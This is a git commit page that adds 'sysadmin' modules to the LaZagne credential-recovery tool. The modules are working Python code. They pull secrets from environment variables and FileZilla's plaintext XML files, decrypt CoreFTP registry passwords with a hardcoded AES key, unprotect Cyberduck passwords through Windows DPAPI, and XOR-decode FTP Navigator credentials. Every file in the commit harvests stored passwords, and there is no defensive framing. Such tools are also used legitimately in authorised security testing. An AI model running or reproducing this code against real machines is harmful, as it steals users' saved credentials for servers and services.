add sysadmin files

Zipcore · Mar 19, 2015 · 1f91b4d · 1f91b4d
1 parent 929c9f7
commit 1f91b4d
Show file tree

Hide file tree

Showing 10 changed files with 604 additions and 0 deletions.
diff --git a/Linux/src/softwares/sysadmin/__init__.py b/Linux/src/softwares/sysadmin/__init__.py
@@ -0,0 +1 @@
+# -*- coding: utf-8 -*-
diff --git a/Linux/src/softwares/sysadmin/env_variable.py b/Linux/src/softwares/sysadmin/env_variable.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+import os
+from config.header import Header
+from config.write_output import  print_debug, print_output
+
+class Env_variable():
+
+	def retrieve_password(self):
+		values = {}
+		pwdFound = []
+
+		# print the title
+		Header().title_debug('Environnement variables')
+
+		# --------- http_proxy --------
+		tmp = ''
+		if 'http_proxy' in os.environ:
+			tmp = 'http_proxy'
+		elif 'HTTP_Proxy' in os.environ:
+			tmp = 'HTTP_Proxy'
+
+		if tmp:
+			values["Variable"] = tmp
+			values["Password"] = os.environ[tmp]
+			pwdFound.append(values)
+
+		# --------- https_proxy --------
+		tmp = ''
+		if 'https_proxy' in os.environ:
+			tmp = 'https_proxy'
+		elif 'HTTPS_Proxy' in os.environ:
+			tmp = 'HTTPS_Proxy'
+
+		if tmp:
+			values["Variable"] = tmp
+			values["Password"] = os.environ[tmp]
+			pwdFound.append(values)
+
+		tab = ['passwd', 'pwd', 'pass', 'password']
+		for i in os.environ:
+			for t in tab:
+				if (t.upper() in i.upper()) and (i.upper() != 'PWD') and (i.upper() != 'OLDPWD'):
+					values["Variable"] = i
+					values["Password"] = os.environ[i]
+		pwdFound.append(values)
+
+		# write credentials into a text file
+		if len(values) != 0:
+			# print the results
+			print_output('Environnement variables', pwdFound)
+
+		else:
+			print_debug('INFO', 'No passwords stored in the environment variables.')
+
diff --git a/Linux/src/softwares/sysadmin/filezilla.py b/Linux/src/softwares/sysadmin/filezilla.py
@@ -0,0 +1,71 @@
+import xml.etree.cElementTree as ET
+from config.header import Header
+from config.write_output import print_debug, print_output
+import os
+
+class Filezilla():
+
+	def retrieve_password(self):
+		# print the title
+		Header().title_debug('Filezilla')
+
+		directory = '~/.filezilla'
+		directory = os.path.expanduser(directory)
+
+		interesting_xml_file = []
+		info_xml_file = []
+		if os.path.exists(os.path.join(directory, 'sitemanager.xml')):
+			interesting_xml_file.append('sitemanager.xml')
+			info_xml_file.append('Stores all saved sites server info including password in plaintext')
+
+		if os.path.exists(os.path.join(directory, 'recentservers.xml')):
+			interesting_xml_file.append('recentservers.xml')
+			info_xml_file.append('Stores all recent server info including password in plaintext')
+
+		if os.path.exists(os.path.join(directory, 'filezilla.xml')):
+			interesting_xml_file.append('filezilla.xml')
+			info_xml_file.append('Stores most recent server info including password in plaintext')
+
+		if interesting_xml_file != []:
+			print_debug('INFO', 'No login and password means anonymous connection')
+
+			pwdFound = []
+			for i in range(len(interesting_xml_file)):
+				print_debug('INFO', interesting_xml_file[i])
+				print_debug('INFO', info_xml_file[i] + '\n')
+
+				xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i])
+
+				tree = ET.ElementTree(file=xml_file)
+				root = tree.getroot()
+
+				servers = root.getchildren()
+				for ss in servers:
+					server = ss.getchildren()
+
+					jump_line = 0
+					for s in server:
+						s1 = s.getchildren()
+						values = {}
+						for s11 in s1:
+							if s11.tag == 'Host':
+								values['Host'] = s11.text
+
+							if s11.tag == 'Port':
+								values['Port'] = s11.text
+
+							if s11.tag == 'User':
+								values['Login'] = s11.text
+
+							if s11.tag == 'Pass':
+								values['Password'] = s11.text
+
+						# write credentials into a text file
+						if len(values) != 0:
+							pwdFound.append(values)
+			# print the results
+			print_output('Filezilla', pwdFound)
+		else:
+			print_debug('INFO', 'Filezilla not installed.')
+
+
diff --git a/Windows/src/LaZagne/softwares/sysadmin/__init__.py b/Windows/src/LaZagne/softwares/sysadmin/__init__.py
diff --git a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py
@@ -0,0 +1,57 @@
+import binascii
+from Crypto.Cipher import AES
+import win32con, win32api
+from config.write_output import print_output, print_debug
+from config.header import Header
+
+class CoreFTP():
+	def get_secret(self):
+		return "hdfzpysvpzimorhk"
+
+	def decrypt(self, hex):
+		encoded = binascii.unhexlify(hex)
+		secret = self.get_secret()
+		BLOCK_SIZE = 16
+		mode = AES.MODE_ECB
+		cipher=AES.new(secret,mode)
+		return cipher.decrypt(encoded).split('\x00')[0]
+
+	def get_key_info(self):
+		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
+		try:
+			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
+		except:
+			return False
+
+		num_profiles = win32api.RegQueryInfoKey(key)[0]
+		pwdFound = []
+		for n in range(num_profiles):
+			name_skey = win32api.RegEnumKey(key, n)
+
+			skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
+			num = win32api.RegQueryInfoKey(skey)[1]
+
+			values = {}
+			for nn in range(num):
+				k = win32api.RegEnumValue(skey, nn)
+				if k[0] == 'Host':
+					values['Host'] = k[1]
+				if k[0] == 'Port':
+					values['Port'] = k[1]
+				if k[0] == 'User':
+					values['User'] = k[1]
+					pwdFound.append(values)
+				if k[0] == 'PW':
+					try:
+						values['Password'] = self.decrypt(k[1])
+					except:
+						values['Password'] = 'N/A'
+		# print the results
+		print_output('CoreFTP', pwdFound)
+
+	def retrieve_password(self):
+		# print title
+		Header().title_debug('CoreFTP')
+
+		if self.get_key_info() == False:
+			print_debug('INFO', 'CoreFTP not installed')
diff --git a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py
@@ -0,0 +1,65 @@
+import sqlite3
+import win32crypt
+import sys, os, platform, base64
+import xml.etree.cElementTree as ET
+from config.write_output import print_output, print_debug
+from config.constant import *
+from config.header import Header
+
+class Cyberduck():
+
+	# find the user.config file containing passwords
+	def get_path(self):
+		if 'APPDATA' in os.environ:
+			directory = os.environ['APPDATA'] + '\Cyberduck'
+
+			if os.path.exists(directory):
+				for dir in os.listdir(directory):
+					if dir.startswith('Cyberduck'):
+						for d in os.listdir(directory + os.sep + dir):
+							path = directory + os.sep + dir + os.sep + d + os.sep + 'user.config'
+							if os.path.exists(path):
+								return path
+
+				return 'User_profil_not_found'
+			else:
+				return 'CYBERDUCK_NOT_EXISTS'
+		else:
+			return 'APPDATA_NOT_FOUND'
+
+
+	# parse the xml file
+	def parse_xml(self, xml_file):
+		tree = ET.ElementTree(file=xml_file)
+
+		pwdFound = []
+		for elem in tree.iter():
+			values = {}
+			try:
+				if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') or elem.attrib['name'].startswith('https'):
+					values['URL'] = elem.attrib['name']
+					encrypted_password = base64.b64decode(elem.attrib['value'])
+					password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
+					values['Password'] = password
+
+					pwdFound.append(values)
+			except:
+				pass
+		# print the results
+		print_output("Cyberduck", pwdFound)
+
+	# main function
+	def retrieve_password(self):
+		# print title
+		Header().title_debug('Cyberduck')
+
+		path = self.get_path()
+		if path == 'CYBERDUCK_NOT_EXISTS':
+			print_debug('INFO', 'Cyberduck not installed.')
+		elif path == 'User_profil_not_found':
+			print_debug('INFO', 'User profil has not been found.')
+		elif path == 'APPDATA_NOT_FOUND': 
+			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
+		else:
+			self.parse_xml(path)
+
diff --git a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py
@@ -0,0 +1,75 @@
+import xml.etree.cElementTree as ET
+import os
+from config.constant import *
+from config.write_output import print_output, print_debug
+from config.header import Header
+
+class Filezilla():
+
+	def retrieve_password(self):
+		# print title
+		Header().title_debug('Filezilla')
+
+		if 'APPDATA' in os.environ:
+			directory = os.environ['APPDATA'] + '\FileZilla'
+		else:
+			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
+			return
+
+		interesting_xml_file = []
+		info_xml_file = []
+		if os.path.exists(os.path.join(directory, 'sitemanager.xml')):
+			interesting_xml_file.append('sitemanager.xml')
+			info_xml_file.append('Stores all saved sites server info including password in plaintext')
+
+		if os.path.exists(os.path.join(directory, 'recentservers.xml')):
+			interesting_xml_file.append('recentservers.xml')
+			info_xml_file.append('Stores all recent server info including password in plaintext')
+
+		if os.path.exists(os.path.join(directory, 'filezilla.xml')):
+			interesting_xml_file.append('filezilla.xml')
+			info_xml_file.append('Stores most recent server info including password in plaintext')
+
+		if interesting_xml_file != []:
+			print_debug('INFO', 'No login and password means anonymous connection')
+			pwdFound = []
+
+			for i in range(len(interesting_xml_file)):
+				print_debug('INFO', interesting_xml_file[i])
+				print_debug('INFO', info_xml_file[i] + '\n')
+
+				xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i])
+
+				tree = ET.ElementTree(file=xml_file)
+				root = tree.getroot()
+
+				servers = root.getchildren()
+				for ss in servers:
+					server = ss.getchildren()
+
+					jump_line = 0
+					for s in server:
+						s1 = s.getchildren()
+						values = {}
+						for s11 in s1:
+							if s11.tag == 'Host':
+								values[s11.tag] = s11.text
+
+							if s11.tag == 'Port':
+								values[s11.tag] = s11.text
+
+							if s11.tag == 'User':
+								values['Login'] = s11.text
+
+							if s11.tag == 'Pass':
+								values['Password'] = s11.text
+
+						# password found 
+						if len(values) != 0:
+							pwdFound.append(values)
+			# print the results
+			print_output("Filezilla", pwdFound)
+
+		else:
+			print_debug('INFO', 'Filezilla not installed.')
+
diff --git a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py
@@ -0,0 +1,49 @@
+import struct, os
+from config.write_output import print_output, print_debug
+from config.header import Header
+
+class FtpNavigator():
+	def decode(self, encode_password):
+		password = ''
+		for p in encode_password:
+			password += chr(struct.unpack('B', p)[0] ^ 0x19)
+		return password
+
+	def read_file(self, filepath):
+		f = open(filepath, 'r')
+		pwdFound = []
+		for ff in f.readlines():
+			values = {}
+			info = ff.split(';')
+			for i in info:
+				i = i.split('=')
+				if i[0] == 'Name':
+					values['Name'] = i[1]
+				if i[0] == 'Server':
+					values['Server'] =  i[1]
+				if i[0] == 'Port':
+					values['Port'] =  i[1]
+				if i[0] == 'User':
+					values['User'] = i[1]
+				if i[0] == "Password":
+					if i[1] != '1' and i[1] != '0':
+						values['Password'] = self.decode(i[1])
+
+			# used to save the password if it is an anonymous authentication
+			if values['User'] == 'anonymous' and 'Password' not in values.keys():
+				values['Password'] = 'anonymous'
+
+			pwdFound.append(values)
+		# print the results
+		print_output('FTP Navigator', pwdFound)
+
+	def retrieve_password(self):
+		# print title
+		Header().title_debug('FTP Navigator')
+
+		path = "C:\\FTP Navigator\\Ftplist.txt"
+		if os.path.exists(path):
+			self.read_file(path)
+		else:
+			print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
+